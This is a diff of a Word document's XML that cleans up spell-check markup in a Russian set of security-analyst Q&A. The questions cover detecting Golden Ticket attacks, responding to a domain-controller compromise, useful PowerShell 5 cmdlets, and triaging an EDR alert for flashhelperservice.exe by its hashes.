-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Атака Golden </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Ticket</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> — это метод компрометации, используемый злоумышленниками для получения несанкционированного доступа к ресурсам в сети Windows. Вот несколько шагов, которые помогут обнаружить такую атаку:</w:t>
+        <w:t>Как обнаружить атаку Golden Ticket?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Атака Golden Ticket — это метод компрометации, используемый злоумышленниками для получения несанкционированного доступа к ресурсам в сети Windows. Вот несколько шагов, которые помогут обнаружить такую атаку:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5080,16 +4067,8 @@
         <w:rPr>
           <w:u w:val="single"/>
         </w:rPr>
-        <w:t xml:space="preserve">Анализ </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:u w:val="single"/>
-        </w:rPr>
-        <w:t>Kerberos</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>Анализ Kerberos</w:t>
+      </w:r>
       <w:r>
         <w:t>: Ищите аномальные запросы на получение билетов (TGT), которые могут указывать на использование поддельных билетов.</w:t>
       </w:r>
@@ -5144,13 +4123,8 @@
         </w:rPr>
         <w:t>Служебные учетные записи</w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>: Обратите</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> внимание на учетные записи, которые не должны использоваться для входа в систему, но активно аутентифицируются.</w:t>
+      <w:r>
+        <w:t>: Обратите внимание на учетные записи, которые не должны использоваться для входа в систему, но активно аутентифицируются.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5184,31 +4158,10 @@
         <w:rPr>
           <w:u w:val="single"/>
         </w:rPr>
-        <w:t xml:space="preserve">Конфигурация </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:u w:val="single"/>
-        </w:rPr>
-        <w:t>Kerberos</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>: Убедитесь</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">, что настройки </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Kerberos</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> соответствуют рекомендациям безопасности, и используйте только современные версии протокола.</w:t>
+        <w:t>Конфигурация Kerberos</w:t>
+      </w:r>
+      <w:r>
+        <w:t>: Убедитесь, что настройки Kerberos соответствуют рекомендациям безопасности, и используйте только современные версии протокола.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5262,23 +4215,7 @@
         <w:t>Инструменты анализа</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">: Используйте инструменты, такие как </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>BloodHound</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> или </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Mimikatz</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>, чтобы выявить аномалии в доступе и привилегиях.</w:t>
+        <w:t>: Используйте инструменты, такие как BloodHound или Mimikatz, чтобы выявить аномалии в доступе и привилегиях.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5314,13 +4251,8 @@
         </w:rPr>
         <w:t>Обучение сотрудников</w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>: Обучите</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> сотрудников распознавать фишинг и другие методы, которые могут быть использованы для получения доступа к учетным записям администраторов.</w:t>
+      <w:r>
+        <w:t>: Обучите сотрудников распознавать фишинг и другие методы, которые могут быть использованы для получения доступа к учетным записям администраторов.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5356,34 +4288,21 @@
         </w:rPr>
         <w:t>Аудит безопасности</w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>: Проводите</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> регулярные аудиты безопасности для выявления и устранения уязвимостей в системе.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Следуя этим шагам, можно повысить вероятность выявления атак Golden </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Ticket</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> и улучшить общую безопасность сети.</w:t>
+      <w:r>
+        <w:t>: Проводите регулярные аудиты безопасности для выявления и устранения уязвимостей в системе.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Следуя этим шагам, можно повысить вероятность выявления атак Golden Ticket и улучшить общую безопасность сети.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5452,13 +4371,8 @@
         </w:rPr>
         <w:t>Изолировать контроллер домена</w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>: Отключите</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> его от сети, чтобы предотвратить дальнейшие атаки и утечки данных.</w:t>
+      <w:r>
+        <w:t>: Отключите его от сети, чтобы предотвратить дальнейшие атаки и утечки данных.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5507,13 +4421,8 @@
         </w:rPr>
         <w:t>Сообщите руководству</w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>: Уведомите</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> руководство и команду по безопасности о произошедшем инциденте.</w:t>
+      <w:r>
+        <w:t>: Уведомите руководство и команду по безопасности о произошедшем инциденте.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5529,13 +4438,8 @@
         </w:rPr>
         <w:t>Уведомите пользователей</w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>: Если</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> необходимо, проинформируйте пользователей о возможных компрометациях их учетных записей.</w:t>
+      <w:r>
+        <w:t>: Если необходимо, проинформируйте пользователей о возможных компрометациях их учетных записей.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5567,13 +4471,8 @@
         </w:rPr>
         <w:t>Анализ журнала событий</w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>: Изучите</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> журналы событий на контроллере домена и других серверах для выявления действий злоумышленника.</w:t>
+      <w:r>
+        <w:t>: Изучите журналы событий на контроллере домена и других серверах для выявления действий злоумышленника.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5589,21 +4488,8 @@
         </w:rPr>
         <w:t>Проверка на вредоносное ПО</w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>: Запустите</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> антивирусные и </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>антималварные</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> сканирования.</w:t>
+      <w:r>
+        <w:t>: Запустите антивирусные и антималварные сканирования.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5644,13 +4530,8 @@
         </w:rPr>
         <w:t>Восстановление из резервной копии</w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>: Если</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> контроллер домена был сильно поврежден, восстановите его из последней надежной резервной копии.</w:t>
+      <w:r>
+        <w:t>: Если контроллер домена был сильно поврежден, восстановите его из последней надежной резервной копии.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5682,13 +4563,8 @@
         </w:rPr>
         <w:t>Обновление системы</w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>: Убедитесь</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>, что все патчи и обновления безопасности установлены.</w:t>
+      <w:r>
+        <w:t>: Убедитесь, что все патчи и обновления безопасности установлены.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5704,29 +4580,16 @@
         </w:rPr>
         <w:t>Пересмотр политик безопасности</w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>: Обновите</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> политики безопасности, включая сложность паролей и двухфакторную аутентификацию.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    Мониторинг</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>: Установите</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> системы мониторинга для обнаружения аномалий в будущем.</w:t>
+      <w:r>
+        <w:t>: Обновите политики безопасности, включая сложность паролей и двухфакторную аутентификацию.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">    Мониторинг: Установите системы мониторинга для обнаружения аномалий в будущем.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5808,13 +4671,8 @@
         </w:rPr>
         <w:t>Проведите аудит безопасности</w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>: Рассмотрите</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> возможность проведения внешнего аудита для оценки текущего уровня безопасности.</w:t>
+      <w:r>
+        <w:t>: Рассмотрите возможность проведения внешнего аудита для оценки текущего уровня безопасности.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5844,34 +4702,24 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Какая функция </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>Какая функция PowerShell 5 является лучшей для команды безопасности?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">В </w:t>
+      </w:r>
       <w:r>
         <w:t>PowerShell</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> 5 является лучшей для команды безопасности?</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">В </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>PowerShell</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve"> 5.0 одной из лучших функций для команды безопасности является </w:t>
       </w:r>
@@ -5880,17 +4728,8 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>Get-</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>EventLog</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>Get-EventLog</w:t>
+      </w:r>
       <w:r>
         <w:t xml:space="preserve">. Эта команда позволяет администраторам просматривать журналы событий </w:t>
       </w:r>
@@ -5921,17 +4760,8 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>Get-</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Acl</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>Get-Acl</w:t>
+      </w:r>
       <w:r>
         <w:t xml:space="preserve"> – для получения списка прав доступа к файлам и папкам.</w:t>
       </w:r>
@@ -5943,7 +4773,6 @@
       <w:r>
         <w:t xml:space="preserve">    </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -5951,7 +4780,6 @@
         </w:rPr>
         <w:t>Set-Acl</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve"> – для изменения прав доступа.</w:t>
       </w:r>
@@ -5968,17 +4796,8 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>Get-</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>WinEvent</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>Get-WinEvent</w:t>
+      </w:r>
       <w:r>
         <w:t xml:space="preserve"> – для работы с более современными журналами событий, позволяя фильтровать и анализировать события.</w:t>
       </w:r>
@@ -5990,21 +4809,12 @@
       <w:r>
         <w:t xml:space="preserve">    </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Invoke</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>-Command</w:t>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Invoke-Command</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> – для выполнения команд на удаленных системах с учетом безопасности.</w:t>
@@ -6024,15 +4834,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Вы получили оповещение от решения EDR, и у вас есть только эта </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>информация(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>инфу о процессе и хеш-сумму). Что вы можете рассказать об этом случае?</w:t>
+        <w:t>Вы получили оповещение от решения EDR, и у вас есть только эта информация(инфу о процессе и хеш-сумму). Что вы можете рассказать об этом случае?</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6080,47 +4882,38 @@
           <w:i/>
           <w:iCs/>
         </w:rPr>
-        <w:t xml:space="preserve">OS Type: </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
+        <w:t>OS Type: windows</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
         <w:rPr>
           <w:i/>
           <w:iCs/>
         </w:rPr>
-        <w:t>windows</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
+      </w:pPr>
+      <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
         </w:rPr>
-      </w:pPr>
-      <w:r>
+        <w:t>MD5: 59c34bc243eb2604533b5f08d30944f8</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
         <w:rPr>
           <w:i/>
           <w:iCs/>
         </w:rPr>
-        <w:t>MD5: 59c34bc243eb2604533b5f08d30944f8</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
+      </w:pPr>
+      <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
         </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-        </w:rPr>
         <w:t>SHA-256: ef214626923d76e24ae5299dd16c53b15847e91a97d2eea79ce951c6bead9b7c</w:t>
       </w:r>
     </w:p>
@@ -6143,319 +4936,256 @@
         <w:pStyle w:val="a3"/>
       </w:pPr>
       <w:r>
-        <w:t>На основании предоставленной информации об оповещении от решения EDR (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Endpoint</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
+        <w:t>На основании предоставленной информации об оповещении от решения EDR (Endpoint Detection and Response) мы можем оценить ситуацию следующим образом:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:rPr>
+          <w:u w:val="single"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>Информация</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:u w:val="single"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Detection</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
+      <w:r>
+        <w:rPr>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>о</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:u w:val="single"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>and</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> Response) мы можем оценить ситуацию следующим образом:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
+      <w:r>
         <w:rPr>
           <w:u w:val="single"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
+        </w:rPr>
+        <w:t>процессе</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:u w:val="single"/>
-        </w:rPr>
-        <w:t>Информация</w:t>
-      </w:r>
-      <w:r>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    Process Name: flashhelperservice.exe</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    Process ID (PID): 6508</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    Operating System: Windows</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
         <w:rPr>
           <w:u w:val="single"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:u w:val="single"/>
-        </w:rPr>
-        <w:t>о</w:t>
-      </w:r>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Hash Values</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    MD5: 59c34bc243eb2604533b5f08d30944f8</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    SHA-256: ef214626923d76e24ae5299dd16c53b15847e91a97d2eea79ce951c6bead9b7c</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Вы можете проверить хэши на таких платформах, как VirusTotal, чтобы определить, является ли файл вредоносным.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>flashhelperservice.exe обычно связан со службой обновления Adobe Flash Player. Однако из-за окончания срока службы Flash Player любые экземпляры этой службы, работающие в современной системе, должны быть тщательно проверены.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Проверка на вредоносное ПО:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Используйте предоставленные хеш-значения (MD5 и SHA-256) для поиска в базах данных аналитики угроз (например, VirusTotal), чтобы определить, был ли этот конкретный файл помечен как вредоносный.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:u w:val="single"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
+        </w:rPr>
+        <w:t>Репутация файла</w:t>
+      </w:r>
+      <w:r>
+        <w:t>: Если хэши возвращают положительные результаты, указывающие на то, что он безопасен или распознан как легитимный файл, вы можете продолжить мониторинг. Если файл помечен как вредоносный, вы должны немедленно предпринять действия для изоляции затронутой системы.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:u w:val="single"/>
         </w:rPr>
-        <w:t>процессе</w:t>
-      </w:r>
+        <w:t>Контекстная информация</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">: Происхождение файла: Определите, где находится файл (например, типичные пути установки или необычные каталоги). </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Родительский процесс: Проверьте, какой процесс запустил flashhelperservice.exe. Это может дать представление о том, был ли он инициирован легитимным приложением или чем-то подозрительным. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:u w:val="single"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
+        </w:rPr>
+        <w:t>Анализ поведения</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">: Изучите, какие действия предпринял процесс (например, сетевые подключения, изменения файлов) на основе телеметрии EDR. Ищите любые боковые перемещения или попытки связаться с внешними серверами. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>Исторические данные</w:t>
+      </w:r>
+      <w:r>
+        <w:t>: Просмотрите журналы на предмет прошлых действий, связанных с этим процессом или похожими процессами.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>Следующие шаги</w:t>
+      </w:r>
+      <w:r>
         <w:t>:</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="a3"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    Process Name: flashhelperservice.exe</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    Process ID (PID): 6508</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    Operating System: Windows</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:rPr>
-          <w:u w:val="single"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:u w:val="single"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>Hash Values</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    MD5: 59c34bc243eb2604533b5f08d30944f8</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    SHA-256: ef214626923d76e24ae5299dd16c53b15847e91a97d2eea79ce951c6bead9b7c</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Вы можете проверить хэши на таких платформах, как </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>VirusTotal</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>, чтобы определить, является ли файл вредоносным.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-      </w:pPr>
-      <w:r>
-        <w:t>flashhelperservice.exe обычно связан со службой обновления Adobe Flash Player. Однако из-за окончания срока службы Flash Player любые экземпляры этой службы, работающие в современной системе, должны быть тщательно проверены.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
